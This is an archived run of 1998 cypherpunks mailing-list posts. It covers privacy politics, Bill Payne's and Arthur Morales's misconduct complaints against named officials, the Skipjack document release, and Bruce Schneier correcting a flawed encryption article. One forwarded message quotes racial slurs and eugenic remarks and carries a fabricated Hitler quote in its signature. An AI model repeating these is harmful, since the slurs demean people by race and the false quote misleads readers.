>In recent weeks, U.S. authorities have helped nab 60 online molesters,
>while the FBI reports that its 3-year-old Innocent Images
>investigation--an online task force identifying predators--has resulted
>in 184 convictions. An impressive stat, but less than confidence
>inspiring when research suggests the average child molester will have
>more than 70 victims throughout his lifetime. 
>
>At the same time we splash sex offenders' names online, our lawmakers
>weigh in with proposed privacy law after privacy law. "No one wants to
>give up privacy," says NCMEC's Rodriguez, whose organization now runs a
>CyberTipline for leads on the sexual exploitation of children. "But what
>do you do when your laws and protections are turned against you?
>Something's got to give." 
>
>But what? Our conventional wisdom that privacy is worth any risks? Just
>touching this petrified opinion will get me slapped with a swastika--but
>as philosopher Arthur Schopenhauer said, "All truth passes through three
>stages. First, it is ridiculed. Second, it is violently opposed. Third,
>it is accepted as being self-evident." 
>
>To be continued--that's for certain. 
>
>Copyright (c) 1998 ZDNet. All rights reserved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Tue, 23 Jun 1998 19:18:29 -0700 (PDT)
To: (Recipient list suppressed)
Subject: QANTAS discriminates against Pauline Hanson's One Nation
Message-ID: <1.5.4.32.19980623195854.00d302f4@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW,

Qantas has banned coverage of Pauline Hanson and One Nation from inflight news.

Qantas has effectively censored Channel 9's inflight coverage of Australian
news and has, in effect, implied that there is something "distasteful" about
Mrs Hanson and her political party.

The action allegedly follows a complaint by a QANTAS staff member about
coverage of Mrs Hanson being offensive to Indonesian passengers on an
international flight.

Pauline Hanson's political adviser, Mr David Oldfield, said it was
"disgraceful, un-Australian activity asking Channel 9 to be political
censors on behalf of Qantas.

"Everything that is said publicly, people should have the right to judge for
themselves whether something matters or doesn't," he said.

"But it certainly isn't up to any airline or anyone else to decide that
legitimate
public debate isn't to be viewed."

If you feel rightfully outraged by this act of censorship by Qantas (the
Australian Airline) please contact them by email:

qantasmedia@qantas.com.au 

I would encourage you to take a moment to express how you feel about this issue.

Finally, please note Ansett have not undertaken censorship of this sort.

GWB




Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 24 Jun 1998 07:16:59 -0700 (PDT)
To: james@wired.com
Subject: nation's most secretive spy agency
Message-ID: <35910972.913@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 6/24/98 8:03 AM

Glave

I am reading http://www.wired.com/news/news/technology/story/13215.html

I recevied a motion from US Assistant Attorney Mitchell yesterday
in the mail.  I haven't read it yet.

Mitchell phoned on f 6/19.  

Mitchell told me she is moving to remand FOIA ALGORITHM request to NSA.

I made a copy of the materials I received and sent them to John Young.

I attach a copy of Morales and my complaint to the senate judiciary
committee.  This e-mail explains more about our interest in NSA.
VISIBILITY.

I do not have much interest in crypto.

One of my problems is a REVERSE cyrpto problem.  Trying to get people to
read
my geek books and obscure binary results.

I MERELY BUILT CRYPTO DEVICES FOR NSA.  

And took a poke at NSA for trying to screw-up Sandia/DOE projects with
bad crypto algorithm and implementation advice. 
http://jya.com/da/whpda.htm
Especially in http://jya.com/da/whpda.htm#apps

NSA has NO SENSE OF HUMOR.

Pseudorandom numbers are close enough to crypto that I understand what
the crypto people are doing.

Morales and I want our money and out of this mess.

Best

Sincerely

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Looks like we succeeded in getting others to read about the gfsr!

In fact, Knuth included the gfsr on page 32 of his books series Art of 
Computer Programming: Vol 2 Seminumerical algorithms.

This likely accounts for 

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

Coauthor Lewis in the above is one of my former MS and PhD students in
computer science.

http://www.friction-free-economy.com/


Subject: 
        Judicial Misconduct at Tenth Circuit Court of Appeals
  Date: 
        Mon, 22 Jun 1998 13:29:01 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        art morales <armoral@sandia.gov>, senator_hatch@Hatch.senate.gov, senator@thurmond.senate.gov,
        chuck_grassley@grassley.senate.gov, senator_specter@specter.senate.gov, 
senator_thompson@thompson.senate.gov,
        info@kyl.senate.gov, senator_dewine@dewine.senate.gov, john_ashcroft@ashcroft.senate.gov, 
michigan@abraham.senate.gov,
        senator_leahy@leahy.senate.gov, senator@kennedy.senate.gov, senator@biden.senate.gov, 
senator_kohl@kohl.senate.gov,
        senator@feinstein.senate.gov, russell_feingold@feingold.senate.gov, dick@durbin.senate.gov, 
senator@torricelli.senate.gov
    CC: 
        steve dillingham <" Steven.Dillingham"@hq.doe.gov>, Robert Nordhaus <" 
Robert.Nordhaus"@hq.doe.gov>, mrgall@ix.netcom.com,
        jy@jya.com, art morales <armoral@sandia.gov>, federico pena <" Federico.F.Pena"@hq.doe.gov>, 
RJPARK@sandia.gov,
        cypherpunks@toad.com, ukcrypto@maillist.ox.ac.uk


Monday 6/22/98 1:02 PM

Senate Judiciary Committee
http://www.senate.gov/committee/judiciary.html

Republicans

Orrin G. Hatch, Utah, Chairman   senator_hatch@Hatch.senate.gov
Strom Thurmond, South Carolina   senator@thurmond.senate.gov
Charles E. Grassley, Iowa   chuck_grassley@grassley.senate.gov
Arlen Specter, Pennsylvania   senator_specter@specter.senate.gov
Fred Thompson, Tennessee   senator_thompson@thompson.senate.gov
Jon Kyl, Arizona   info@kyl.senate.gov
Mike DeWine, Ohio   senator_dewine@dewine.senate.gov
John Ashcroft, Missouri   john_ashcroft@ashcroft.senate.gov
Spencer Abraham, Michigan   michigan@abraham.senate.gov
Jeff Sessions, Alabama

Democrats

Patrick J. Leahy, Vermont   senator_leahy@leahy.senate.gov
Edward M. Kennedy, Massachusetts   senator@kennedy.senate.gov
Joseph R.Biden, Jr., Delaware   senator@biden.senate.gov
Herb Kohl, Wisconsin   senator_kohl@kohl.senate.gov
Dianne Feinstein, California   senator@feinstein.senate.gov
Russell D. Feingold, Wisconsin   russell_feingold@feingold.senate.gov
Richard Durbin, Illinois   dick@durbin.senate.gov
Robert Torricelli, New Jersey   senator@torricelli.senate.gov

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Moore, Barrett, Weis and help get this matter settled.

Thursday March 30, 1995 I wrote Tenth Circuit clerk Hoecker to request a
copy of the docket sheets for case 94-2205  Payne v. Sandia Corporation,
et al

Hoecker did not answer my letter.

On Tuesday March 5,1996 I  wrote  Judge Lucius D. Bunton to ask his help
to get a copy of the docket sheets.  No response.

On Monday September 23, 1996 Arthur R Morales and I wrote  Henry A.
Politz, Chief Judge U.S. Court of Appeals - Fifth Circuit to ask his
help to get a copy of the docket sheets of my case and Morales' Tenth
Circuit case 95-2204.

Tenth Circuit also refused to send Morales copies of docket sheets for
his case.

Politz is Bunton's boss.  No response.

Friday May 30, 1997 I wrote Antonin Scalia to get this help to get a
copy of the docket sheets.  No response.

5 May 1998 citizen John Young finds docket sheets on

    Source: PACER, U.S. Court of Appeals, 10th Circuit, 1-800-279-9107

and posts them on Internet at http://jya.com/whp-10usca.htm

  Docket as of April 10, 1998 0:05 am
  Proceedings include all events.
  94-2205  Payne v. Sandia Corporation, et al

shows that I filed my Brief of the Appellant on 2/19/95.

2/23/95     [835344] Appellant's brief filed by William H. Payne.
            Original and 7 copies.   c/s: y. Served on 2/19/95  Oral
            argument? pro se. Appellee/Respondent's brief due 3/24/95
            for Thomas P. Wright, for Robert Surran, for Paul A.
            Stokes, for Mary J. Stang, for Tommy A. Sellers, for Craig
            A. Searls, for Albert Narath, for Preston B. Herrington,
            for Peter S. Hamilton, for Roger L. Hagengruber, for James
            R. Gosler, for Harold L. Folley, for Robert L. Ewing, for
            C. William Childers, for Harvey J. Brewster, for Sandia
            Corporation (mbm)

mbm writes "Appellee/Respondent's brief due 3/24/95"

Sandia had sent me a copy of its brief by 3/28/96.

I filed  attached MOTION TO GRANT PLAINTIFF-APPELLANT'S DEMANDS ON BASIS
THAT DEFENDANT-APPELLEES FAILED TO FILE BRIEF WITHIN 30 DAYS SPECIFIED
BY FEDERAL RULE OF APPELLATE PROCEDURE 31 on Tuesday the 28th day of
March, 1995

My February 28 MOTION at the Tenth Circuit is filed WITHOUT notice of
service logged.

4/4/95       [845484] Appellant's motion filed by Appellant William H.
             Payne [94-2205] to grant appellant's demands on basis that
             appellees' failed to file timely brief. Original and 3
             copies  c/s: y (mbm)

In 1995 FRAP 25 (a) stated  "[b]riefs shall be deemed filed on the day
of mailing if the 
most expeditious form of delivery by mail, excepting special delivery,
is used."

FRAP 25 has been changed by 1998 to
http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a

Since I mailed Appellant's motion filed by Appellant William H.  Payne
[94-2205] to grant appellant's demands on basis that appellees' failed
to file timely brief on 3/28/98, it is likely Sandia's lawyer Friedman
received it 3/29/95.

Tenth Circuit logs

3/30/95      [844759] Appellee's brief filed by Sandia Corporation,
             Harvey J. Brewster, C. William Childers, Robert L. Ewing,
             Harold L. Folley, James R. Gosler, Roger L. Hagengruber,
             Peter S. Hamilton, Preston B. Herrington, Albert Narath,
             Craig A. Searls, Tommy A. Sellers, Mary J. Stang, Paul A.
             Stokes, Robert Surran, Thomas P. Wright. Original and 7
             copies. c/s: y. Served on 3/27/95  Oral Argument? y
             (appellant is pro se) Appellant's optional reply brief due
             4/13/95 for William H. Payne (mbm)

Federal Rule of Appellate Procedure [FRAP] 26 (c) states

  (c) Additional Time after Service. When a party is required or
permitted to act within a      prescribed period after service of a
paper upon that party, 3 calendar days are added to the     prescribed
period unless the paper is delivered on the date of service stated in
the proof of   service. 

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c

While the Tenth Circuit ASSERTS Appellees' brief was, in fact, served on
3/27/95
evidence given below points to the brief  was served, in fact, on
3/29/95.  

I allege that Friedman affixed a false date of service to Sandia's
brief.

I WAS NEVER PROPERLY SERVED.  I wrote

          Wednesday March 29, 1995

          Dan Friedman
          Simons, Cuddy & Friedman
          Pecos Trail Office Compound
          1701 Old Pecos Trail
          POB 4160
          Santa Fe, NM 87502-4160
          505-988-4476
          505-984-1807 FAX

          Dear Lawyer Friedman:

          Today at 14:00 hours I found a green and white about 9x13
          inch envelope in our mail box at my home.

          Mailing label indicated that the envelope came from your
          firm.  CONFIDENTIAL was stamped on the mailing label.

          I  wrote "Received at 14:00 hours on W 3/29/95 with no
          POSTMARK OR STAMP by W. H. Payne" at the bottom of the
          envelope.

          There was no STAMP OR POSTAGE METER LABEL or 
          POSTMARK on the envelope.

          Therefore, I gave the envelope to US Postal Service
          supervisor Mel at 14:49 hours today at the Postal Receiving
          station at 9904 Montgomery, NW in Albuquerque.  Mel has a
          copy of the cover of the envelope with Mel's note written on
          it.

          Mel told me the post office was going to return the envelope
          to your firm for proper mailing.

          I ask:

         1    What did this envelope contain?  Please identify
              the documents precisely.

         2    If any Certificates of Service were included in the
              envelope, then what were the dates affixed to these
              documents?

         3    Who placed this envelope in our mail box?

         Lawyer Friedman:  It appears you missed an important filing
         date.  And are in the process of attempt to correct your
         failure.  But may be using illegitimate methods to conceal
         your failure.

         Please respond as soon as possible so that we all may
         discover what has happened here." ...

Lawyer Friedman did not respond to the above letter.

But Friedman did mail me Appellees' brief many days later in envelope
showing TRUE MAILING date.  Certificate of service on received
Appellees' brief
did not reflect postmark date.

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

But Tenth Circuit clerks Fisher and Hoecker despite my protests and
submission of
evidence may have stamped FILED on Sandia's IMPROPERLY SERVED 
Appellee/Respondent's brief according to the Federal Rules of Appellate
Procedure.

Laywer Friedman FALSIFIED THE CERTIFICATE OF SERVICE.   

Friedman DID NOT MAIL ME "Served on 3/27/95."

d) Proof of Service; Filing. A paper presented for filing shall contain
an acknowledgment of service by the   person served or proof of service
in the form of a statement of the date and manner of service, of the
name of the person served, and of the addresses to which the papers were
mailed or at which they were delivered, certified by the person who made
service. Proof of service may appear on or be affixed to the papers
filed. When a brief or appendix is filed by mailing or dispatch in
accordance with Rule 25(a)(2)(B), the proof of service shall also state
the date and manner by which the document was mailed or dispatched to
the clerk.

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a
  
Crime apparently committed by Hoecker and Fisher is

 1017. Government seals wrongfully used and instruments wrongfully
sealed 

Whoever fraudulently or wrongfully affixes or impresses the seal of any
department or agency of the United States, to or upon any certificate,
instrument, commission, document, or paper or with knowledge of its
fraudulent character, with wrongful or fraudulent intent, uses, buys,
procures, sells, or transfers to another any such certificate,
instrument, commission, document, or paper, to which or upon which said
seal has been so fraudulently affixed or impressed, shall be fined under
this title or imprisoned not more than five years, or both. 
http://www.law.cornell.edu/uscode/18/1017.shtml

Despite my protests of judicial misconduct Judges Moore, Barrett, Weis
award decision to Sandia

10/6/95      [890055] Order filed by Judges Moore, Barrett, Weis
             "...All outstanding motions are denied..." (found in Order
             & Judgment of 10/6/95) [879579-1]  Parties served by mail.
             (pdw)

when these judges should not have had Appellees' brief before them.

Then in an apparently attempt to conceal what happened

10/6/95     [890076]  NOTE: THIS ENTIRE CASE IS SEALED. Terminated on
            the Merits after Submission Without Oral Hearing; Judgment
            Affirmed; Written, Signed, Unpublished. Moore, authoring
            judge; Barrett; Weis. [94-2205] (pdw)

I WON MY APPEAL, pro se, ON A TECHNICALITY but judges Judges Moore,
Barrett, Weis
awarded the win to Sandia Labs!

Members of Congress, judicial misconduct in this matter has been
well-documented.  Court records
filed with the Tenth Circuit.  But CURRENTLY under seal.

Lawyers involved in this matter attempt to use the legal strategy of
IGNORE and STONEWALL to
attempt to deny me justice.  

Ignoring and stonewalling by lawyers forced Morales and me to seek
visibility so lawyers
could no longer ignore and stonewall.

Lawyer attitude apparently is that they ignore rules of civil procedure
or even the law so long
as their actions are invisible to public scrutiny.

Visibility was achieved by suing the National Security Agency which
revealed even more judicial misconduct http://www.jya.com/whp052898.htm.

I would like to settle all  matters involved with this unfortunate
cyrpto-related matter,
which includes criminal violations of the Privacy Act.

DOE lawyer Steve Dillingham asked me to prepare a settlement offer in
1994.  I wrote a
settlement letter  May 22, 1994 to Dillingham.  Nothing happened.

June 11, 1998 I made several modifications to my 1994 settlement letter
and sent it e-mail
to Robert Nordhaus, Chief Counsel, DOE.

I ask that you

1  help with settlement of my six-year-old since I won my appeal at the
Tenth Circuit,
2  investigate Tenth Circuit case 94-2205  Payne v. Sandia Corporation,
et al to bring
   the guilty to justice.

Sincerely

william payne

505 292 7037  I am not reading e-mail

http://jya.com/whpfiles.htm
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

Coauthor Lewis in the above is one of my former MS and PhD students in
computer science.

http://www.friction-free-economy.com/



Monday 6/22/98 1:04 PM

Members of Congress

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Anderson, Barrett, Logan and request a congressional
investigation.

After several years, with Payne, of trying to get Tenth Circuit to send
docket sheets from my case,
citizen John Young  http://www.jya.com/index.htm  locates docket sheets
and posts them
    
  Morales Case Dockets 10th USCA                    June 12, 1998

on Internet at http://www.jya.com/arm061298.htm.

  Source: Online records Tenth Circuit Court of Appeals via PACER 

  GENERAL DOCKET FOR
  Tenth Circuit Court of Appeals

  Court of Appeals Docket #: 95-2204                           Filed:
9/29/95
  Nsuit: 3440
  Morales v. Sandia National Lab.
  Appeal from: United States District Court for the District of New
Mexico

I filed

11/9/95     [898274] Appellant's brief filed by Arthur R. Morales.
            Original and 2 copies.   c/s: y. Served on 11/7/95.  Oral
            argument? pro se. Appellee's brief due 12/11/95 for Sandia
            National Lab. (pdw)

Sandia files its FIRST ATTEMPT at

12/11/95   [905033] Appellee's deficient brief filed by Sandia
           National Lab.. Appellee's corrected brief due 12/21/95 for
           Sandia National Lab.  additional copies received 12/11/95.
           (fg)

Tenth Circuit court clerk Patrick Fisher writes Wells on December 11,
1995
concerning Sandia's deficient brief

  [C]orrections, however made, must be accompanied by proof of service
  upon all other parties to the appeal. ...

and issues

12/14/95   [905975] FIRST notice of rules violation for Deborah D.
           Wells for Appellee Sandia National Lab. (sls)

Wells submits

12/21/95    [907974] Appellee's brief filed by Sandia National Lab..
            Original and 7 copies.   c/s: y. Served on 12/20/95  Oral
            Argument? n Appellant's optional reply brief due 1/8/96 for
            Arthur R. Morales (mbm)

but DOES NOT serve me with a copy.

Wells later admits in

2/1/96        [917660] Response filed by Sandia National Lab.
              Appellant/Petitioner motion to clarify   Original and 3
              copies.  c/s: y response Null Relief Code (fg)

Certificate of Service date 30th day of January, 1996,

  [h]ad Appellant simply made a phone call to the Tenth Circuit, he
could
  have established that the Defendant-Appellee's corrected brief was
indeed
  filed on a timely basis, ...

I protested by filing

1/3/96       [909965] Appellant's motion "for the Court to Grant
             Appeal" filed by Appellant Arthur R. Morales [95-2204].
             Original and 3 copies.  c/s: y. (pdw)

1/3/96       [909966] Appellant's motion "for New Trial" filed by
             Appellant Arthur R. Morales [95-2204]. Original and 3
             copies.  c/s: y. (pdw)

1/3/96       [909967] Appellant's motion "to Discipline
             Defendant-Appellee" filed by Appellant Arthur R. Morales
             [95-2204]. Original and 3 copies.  c/s: y. (pdw)

because Sandia did not properly serve me in violation of Fisher's
December
11, 1995 order.

The Tenth Circuit court of appeals should NOT, by its own rules, filed
Appellee's brief filed by Sandia National Lab..  Original and 7
copies.   
c/s: y. Served on 12/20/95

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

And is doubtful whether court clerk Fisher had any authority under
appellate procedure
to permit Wells to correct her deficient brief.  

Rather Sandia's  brief did not comply with with Federal Rules of
Appellate Procedure and should have been summarily rejected for filing.

I WON, pro se, my appeal to the Tenth circuit on a technicality but
Judges Anderson, Barrett, Logan
awarded the win to Sandia Labs.

4/2/96        [932848] Order filed by Judges Anderson, Barrett, Logan
              denying parties' motions for general relief(found in Order
              and Judgment of 4/2/96)--"...During the course of this
              appeal, the parties have filed various motions for
              dismissal, summary grant, and sanctions. We find no merit
              to any of these motions, and they are [920851-1] Parties
              served by mail. (pdw)

by accepting and judging on a documents which was not permitted to be
before the court by
its own rules.

Judicial misconduct in my case has been well-documented as it is in
Payne's case.

Payne and I speculate that similar judicial misconduct may have occurred
at the Tenth Circuit.

Sandia lawyer Robert J Park wrote me a settlement letter on Feb 18,
1998.

I filled in the blanks and made minor handwritten chages and returned it
on February 22, 1998.  

But my offer has not yet been accepted.

I ask that you

1  help have my settlement offer accepted,
2  investigate judicial misconduct in case 95-2204 and punish the
guilty.

Some citizens can only express such frustrations with the US court
system with violence.

I seek change by legal reform.

Sincerely

Arthur R Morales
505 345 1381



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Wed, 24 Jun 1998 09:35:21 -0700 (PDT)
To: cryptography@c2.org>
Subject: OCR'ed versions of Skipjack docs
Message-ID: <413AC08141DBD011A58000A0C924A6D52C357C@MVS2>
MIME-Version: 1.0
Content-Type: text/plain


Anyone have an OCR'ed version of this?  These PDF's look like scanned or
faxed images.

Ern

	-----Original Message-----
	From:	John Young [SMTP:jya@pipeline.com]
	Sent:	Wednesday, June 24, 1998 6:53 AM
	To:	cypherpunks@toad.com
	Subject:	Skipjack Up


	John,

	The files are up, and hopefully all working OK.  See


	http://csrc.nist.gov/encryption/skipjack-kea.htm

	Ed Roback





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 24 Jun 1998 06:56:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Skipjack Up
Message-ID: <199806241356.JAA30765@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


John,

The files are up, and hopefully all working OK.  See


http://csrc.nist.gov/encryption/skipjack-kea.htm

Ed Roback






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CustomNews@INTMAIL.TURNER.COM
Date: Wed, 24 Jun 1998 07:36:53 -0700 (PDT)
To: TEXTCUSTOMNEWSUPDATE@CNNIMAIL1.CNN.COM
Subject: New Features @ CNN Custom News
Message-ID: <199806241410.KAA11366@belize>
MIME-Version: 1.0
Content-Type: text/plain


Hello and thanks for using CNN Custom News.  As part of our
commitment to make the best personalized news service even
better, CNN and Oracle have recently added two great new
features to Custom News at http://cnn.com/CustomNews:


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
KEEP AN EYE ON YOUR FAVORITE CATEGORY!
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

This latest feature allows you to choose one category that will
always appear at the top of your personal picks when you check
Custom News.

For instance, if U.S.:Government:Presidential is your favorite
category, you don't have to go to the U.S. page to see it...put
it front and center on your personal homepage.

To select your favorite category, visit your Custom Profile
page at:

http://CustomNews.CNN.com/cnews/pna_cust.customize#Favorite

and use the drop down box to make your choice. Push the 'done'
button and that's it!


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
WE'VE ADDED YET ANOTHER SOURCE:  PR NEWSWIRE
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

The addition of PR Newswire to Custom News provides even deeper
business content and improved tracking of particular companies.
The latest press releases are available to you almost as soon as
they hit the wire.

Now, you'll be able to track even more of the latest news
regarding your specific companies of interest!


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
WHAT IF I'VE FORGOTTEN MY PASSWORD?
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

If you have not used the service in a while or are on a new
computer, you may need to enter your user name and password.
If you can remember your user name, but forgot your password,
the system will prompt you with the reminder message you
created at the time of registration. The reminder will appear
directly above your login name.

If you have forgotten both your user name and password, simply
open a new account with our QuickStart Profile option.  It's
fast and easy to start using CNN Custom News again!



Thanks for your time.  If you haven't already, come by
CNN.com/CustomNews and check out the improved Custom News
service.

Sincerely,

The CNN Custom News Team
http://CNN.com/CustomNews


=============================================================
If you would rather not receive future updates about Custom News
features and events, please go to
http://CustomNews.CNN.com/cnews/pna_auth.register and
uncheck the "new Custom News features" checkbox.

If you cannot access the above page, but would like to be
unsubscribed from this list, please go to
http://CNN.com/EMAIL/customnews/ and enter your e-mail address.

Please DO NOT reply to this e-mail address.






CNN Interactive email id:11339101041640714




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 24 Jun 1998 07:46:39 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Fwd: Re: Banning privacy: A radical proposal
Message-ID: <199806241458.KAA01546@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>From: "Jean-Francois Avon" <jf_avon@citenet.net>
>To: "William H. Geiger III" <whgiii@invweb.net>
>Date: Wed, 24 Jun 1998 10:38:12 -0500
>Reply-To: "Jean-Francois Avon" <jf_avon@citenet.net>
>Priority: Normal
>X-Mailer: PMMail 98 Standard (2.00.1500) For Windows 95 (4.0.1111)
>MIME-Version: 1.0
>Content-Type: text/plain; charset="iso-8859-1"
>Content-Transfer-Encoding: 7bit
>Subject: Re: Banning privacy: A radical proposal
>

On Wed, 24 Jun 1998 00:38:06 -0500, William H. Geiger III wrote:

>
>And if they really want to save some children why don't they shut down the
>multi-billion dollar infanticide industry known as abortion. Why are these
>medical hacks allowed to do to children what they would be jailed for
>doing to a dog? Perhaps because it serves nicely with the elitist goals of
>population control (need to keep the number of niggers, bean pickers, and
>white trash down to a controllable number) not to mention that their
>pockets are well lined by the hacks.

Hey William, that's called "woman freedom to choose".  Woman right precedes the
baby-that-might-be rights for she is the sine-qua-none condition for the baby-who-might-be
to
exist.

But it is only *very* rarely that I disagree with you...  ;-)

Ciao

jfa

Definition:  FACISM: n.:  a political and economic movement, strongly nationalistic,
magnifying the rights of the state as opposed to those of the individual, in which
industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance,
is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S.
Supreme Court Justice.
        -------------------------------------------------
"1935 will go down in history! For the first time a civilized nation has full gun
registration! Our streets will be safer, our police more efficient, and the world will
follow our lead in the future!"
					-Adolf Hitler, April 1935
        -------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C



===================END FORWARDED MESSAGE===================


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 24 Jun 1998 10:33:31 -0700 (PDT)
To: advancedinfo@email.msn.com
Subject: Comments on "Encryption is Key to Securing Data" 22 Jun 98
Message-ID: <4.0.1.19980624120317.00e447b0@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


This note is to comment on your article,  "Encryption is Key to Securing Data," that appeared in the 22 Jun 98 issue of InternetWeek.  I'm not sure where to start.  Almost every statement made in the copy is erroneous.  (There was an error when I tried to download the article from your website, so I will retype.  Apologies for minor typos.)

Encryption is Key to Securing Data
by Dayna DelMonico

"Although encryption terminology can make even the most technically astute user cringe, encryption is fairly simple."  

I agree, although the rest of this article seems to prove me wrong.  

"It's the process of scambling and unscrambling information."

Partly.  It's confidentially (what you said above--making sure secret things stay secret), integrity (making sure data doesn't get modified in transit), authentication (the digital analogue of a signature), and non-repudiation (making sure someone can't say something and then later deny saying it).  Cryptography is a lot more than simple encryption.

"Encryption products showed up when MIS managers adopted two basic encryption technologies from the federal government: private and public-key encryption."

Nothing correct here.  The Federal government has no public-key cryptography standards; MIS managers have nothing to adopt from the Federal government.  You might be thinking of DES, a symmetric encryption algorithm.  (More on this confusion below.)  In any case, commercial use of cryptography products has developed completely independently from government interference.  In fact, things like export control and key escrow are making it harder to buy secure commercial products, not easier.

"With private key encryption, the sends and recieve are the holders and use the same key (algorithm) to secure information."

No.  First off, private-key encryption is a bad term; use "symmetric encryption."  Second, I'm not sure what they are the holders of.  With symmetric encryption, both the sender and the receiver must have the same key; that may be what you mean.  In any case, the key and the algorithm are completely seperate.  This is one of the cornerstones of post-Medieval cryptography.

"With public key encryption, senders and receivers hold a commonly used public key, with an additional private key held only by specific institutions."

Not even close.  With public-key encryption, each receiver has a public key and a private key.  The public key is published.  The private key is held, in secret, by the receiver.  To send a message to someone, the sender gets the public key form some public database and uses it to encrypt the message.  The receiver uses his private key to decrypt it.  There are no specific institutions that have additional private keys, unless you are thinking about key escrow systems (which are related, but not the same).

"To protect systems from the loss of the key, many vendors offer assymetric encypion, which uses two keys."

Sort of.  Assymetric encryption is the same as public-key encryption (just another word), and there are two keys.  But the reason for using public-key encryption is not to prevent the loss of a key, but to facilitate key management.  (With symmetric encryption, both the sender and receiver have to share a key.  How this sharing takes place can be very complicated.)

"Users can choose from products based on various schemes.  Beware, however, that even stronger encryption methods are on the horizon and destined for the next generation of encryption products.  The National Institute of Standards and Technology (NIST) is expected to complete and Advanced Encryption Standard (AES) by the end of the year."

Even NIST has said that AES will not be finalized before 2000.  And AES is just a new symmetric algorithm; it has nothing to do with public-key cryptography.

"The new standard wil luse a 128-bit block size, with key lengths of 128-, 192-, and 256-bits, as opposed to the current 64-bit blocks with 56-bit key standard."

True.  The current standard is DES.

"RSA Data Security also has proposed its own algorithm to content for the new AES standard."

Sort of.  NIST has solicited proposals for algorithms.  Fifteen groups submitted, including RSA Data Security.  RSADSI is competing with other groups--Cylink, IBM, Entrust, Counterpane Systems, NTT, etc--not with NIST.  NIST does not hav an algorithm.

"RSA's extensions to DES, RC4 and RC5 implement multiple keys as well as digital signatures."

Many mistakes here.  RSADSI submitted RC6 to the AES process, which uses many ideas from RC5.  It has nothing to do with DES or RC4.  I'm not sure why multiple keys is something to talk about; as I said above, every algorithm post the Middle Ages uses multiple keys.  And digital signatures have nothing to do with the AES process.  AES is a  new symmetric encryption algorithm; digital signatures are done with public key cryptography.  They are different.

"Another contender is Blowfish II."

I submitted this algorithm.  We called it Twofish, but some early press reports called it Blowfish II.

"The Blowfish scheme, often referred to as PGP (Pretty Good Privacy), lets the sending and receiving computers negotiate a complex number."

First, Blowfish is never referred to as PGP.  Blowfish is a symmetric encryption algorithm.  PGP is an email security product.  PGP could have decided to use Blowfish, but it used IDEA and CAST instead.  Those are two different encrytpion algorithms.  And neither PGP, nor Blowfish, nor anything else discussed to or alluded to in this article, involve sending and receiving computers negotiating complex numbers.

"That number is used to scamble the transmission and unscramble the data that is received."

